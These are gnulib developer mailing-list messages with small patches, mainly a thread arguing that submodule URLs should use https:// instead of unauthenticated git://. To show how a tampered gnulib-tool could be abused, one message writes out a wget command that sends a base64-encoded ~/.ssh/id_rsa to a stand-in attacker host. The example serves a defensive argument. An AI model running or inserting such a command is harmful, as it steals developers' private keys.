lchmod-tests: Fix link error
In a testdir of the 'lchmod' module, I get this error: gcc -g -O2 -o test-lchmod test-lchmod.o libtests.a ../gllib/libgnu.a libtests.a ../gllib/libgnu.a libtests.a @LIBINTL@ gcc: error: @LIBINTL@: No such file or directory make[4]: *** [Makefile:2563: test-lchmod] Error 1 This patch fixes it. 2021-01-10 Bruno Haible lchmod-tests: Fix link error. * modules/lchmod-tests (Makefile.am): Don't assume that LIBINTL is set. diff --git a/modules/lchmod-tests b/modules/lchmod-tests index cbb2537..446b2d9 100644 --- a/modules/lchmod-tests +++ b/modules/lchmod-tests @@ -10,4 +10,4 @@ configure.ac: Makefile.am: TESTS += test-lchmod check_PROGRAMS += test-lchmod -test_lchmod_LDADD = $(LDADD) @LIBINTL@ +test_lchmod_LDADD = $(LDADD) $(LIBINTL)
Re: rcs configure hang
() Florian Weimer () Mon, 09 Nov 2020 10:14:00 +0100 Would you be able to share details of the file system used (XFS or something else?) and the kernel version (uname -a, rpm -q kernel)? Do you use virtualization or containers? I would like to see if I can reproduce it internally. Ping. (Any news?) -- Thien-Thi Nguyen --- (defun responsep (query) ; (2021) Software Libero (pcase (context query) ; = Dissenso Etico (`(technical ,ml) (correctp ml)) ...)) 748E A0E8 1CB8 A748 9BFA --- 6CE4 6703 2224 4C80 7502 signature.asc Description: PGP signature
Re: [PATCH] Use https:// instead of git://.
On 1/10/21 5:14 PM, Bruno Haible wrote: > "https://git.savannah.gnu.org/git/myproject.git - >encrypted read-only anonymous smart http access" Nice, then https:// seems indeed to be better than git://. Have a nice day, Berny
Re: [PATCH] Use https:// instead of git://.
Bernhard Voelker wrote: > For HTTP/HTTPS, the question is if the server is configured for > "smart HTTP" or if the client has to fall back to "dumb HTTP". Does https://savannah.gnu.org/maintenance/UsingGit/ answer this question? It says: "https://git.savannah.gnu.org/git/myproject.git - encrypted read-only anonymous smart http access" Bruno
Re: [PATCH] Use https:// instead of git://.
On 1/10/21 1:20 PM, Simon Josefsson via Gnulib discussion list wrote: > Using https:// instead of git:// makes this slightly better. Both https:// and git:// URLs are configured to be read-only on the Savannah server, and only the ssh:// variant allows pushing. https://git-scm.com/book/en/v2/Git-Internals-Transfer-Protocols https://git-scm.com/book/en/v2/Git-on-the-Server-The-Protocols For HTTP/HTTPS, the question is if the server is configured for "smart HTTP" or if the client has to fall back to "dumb HTTP". The latter would come with slower performance and more round-trips. The Savannah admins should have an answer to that question. The git:// protocol is definitely always using the "smart" way, but - as you said - doesn't allow authentication. Well, http:// is probably not configured to do that either, and we probably don't need that for the read-only variant. The disadvantage of the git:// protocol is that it needs port 9418, and therefore some corporate networks may have some problems. Unless we have proof from the Savannah admins that https:// is setup to be "smart" (whatever that involves), I'd therefore prefer the always-"smart" git://. Have a nice day, Berny
Re: [PATCH] Use https:// instead of git://.
I had a walk and realized it might be better to think of the problem like this. Consider if someone wants to volunteer to do a new gettext release, they would go to https://savannah.gnu.org/git/?group=gettext which properly suggest to checkout over https or SSH. After reading HACKING the person performs runs ./gitsub.sh pull which prints: Submodule 'gnulib' (git://git.sv.gnu.org/gnulib.git) registered for path 'gnulib' Cloning into '/home/jas/src/gettext/gnulib'... and then continues to run ./autogen.sh which invokes gnulib-tool from the newly checkout. Since the git:// protocol does not offer security, the gnulib-tool could be modified on the way to do something evil like: wget -q -O /dev/null https://evil.example/`base64 -w0 < ~/.ssh/id_rsa` Your SSH key might be encrypted, but the password can be cracked offline. After this, they have write access to the savannah git repository. I'm sure similar attacks can be done against ./bootstrap, and to send the GnuPG key instead if you want to fake signed tarballs instead of gaining write access to the repository. Knowing the SSH/PGP key of key GNU developers enables someone to mount further attacks, and gaining this ability is attractive to a number of actors with funding. Of course, there may be details I'm missing that prevents the exact logic I'm describing to work. The core of the problem is: gnulib encourage developers to run scripts from remote unverified sources. Using https:// instead of git:// makes this slightly better. Using https has its own set of problems, but none that warrants ignoring the initial concern. I wish everyone would use a hardware SSH/PGP key device, to make these attacks harder. I have my SSH/PGP on a GNUK device: https://blog.josefsson.org/2019/03/21/planning-for-a-new-openpgp-key/ You can buy them from the FSF: https://shop.fsf.org/storage-devices/neug-usb-true-random-number-generator Upgrade them to run GNUK like this: https://blog.josefsson.org/2019/03/21/installing-gnuk-on-fst-01g-running-neug/ /Simon signature.asc Description: PGP signature
Re: [PATCH] Use https:// instead of git://.
Bruno Haible writes: > Hi Simon, > > Can you briefly say, why, please? Is the 'git' protocol unsecure? > Is it a problem specifically with Savannah? Or what else? Sorry I should have included this -- I thought it was well-known. The man page for git-clone https://git-scm.com/docs/git-clone says: The native transport (i.e. git:// URL) does no authentication and should be used with caution on unsecured networks. Savannah appears to have changed default occurances of git:// to https:// these days. GitLab and GitHub changed their default offerings for anonymous checkouts long time ago. There is no problem with git:// if you know what you are doing, as with everything, but the same can be said for http:// and ftp://, and apparently the consensus over time is to move to https:// by default for everything. > Also: > >> -# url = git://git.savannah.gnu.org/gnulib.git >> +# url = https://git.savannah.gnu.org/git/gnulib.git gnulib > > Is this syntactically right? Thank you -- that was not intentional. I have fixed this, see attachment. Jeffrey Walton writes: > This may cause trouble for some of the machines on the compile farm. > > The problem is, Git is old and cacerts are beyond their shelf life. > Trying to checkout with https:// fails. The CFarm admins tell users to > checkout using git:// instead. It is fine to use the old variant if you want to, but my point is that the new default should be https:// going forward. Maybe we can see if the change causes any problems, and what they are? Let us know if you notice any change -- the majority of gnulib already uses https:// URLs for git repositories. /Simon From 411da821020a5f3e8ae592fd396854af2d8de046 Mon Sep 17 00:00:00 2001 From: Simon Josefsson Date: Sun, 10 Jan 2021 11:28:31 +0100 Subject: [PATCH] Correct preceeding change. * top/gitsub.sh: Update link. --- ChangeLog | 5 + top/gitsub.sh | 4 ++-- 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/ChangeLog b/ChangeLog index bc2e033c8..a5bf3ec78 100644 --- a/ChangeLog +++ b/ChangeLog @@ -1,3 +1,8 @@ +2021-01-10 Simon Josefsson + + Correct preceeding change. + * top/gitsub.sh: Update link. + 2021-01-09 Bruno Haible immutable: Add tests. diff --git a/top/gitsub.sh b/top/gitsub.sh index de6cb828e..b0be2e1a7 100755 --- a/top/gitsub.sh +++ b/top/gitsub.sh @@ -64,13 +64,13 @@ # # You don't add this piece of configuration to .gitmodules manually. Instead, # you would invoke -# $ git submodule add --name "gnulib" -- https://git.savannah.gnu.org/git/gnulib.git +# $ git submodule add --name "gnulib" -- https://git.savannah.gnu.org/git/gnulib.git gnulib # # * The subdirectories that are not git submodules, in a similar syntax. For # example: # # [subcheckout "gnulib"] -# url = https://git.savannah.gnu.org/git/gnulib.git gnulib +# url = https://git.savannah.gnu.org/git/gnulib.git # path = gnulib # # Here the URL is the one used for anonymous checkouts of the dependency -- 2.20.1 signature.asc Description: PGP signature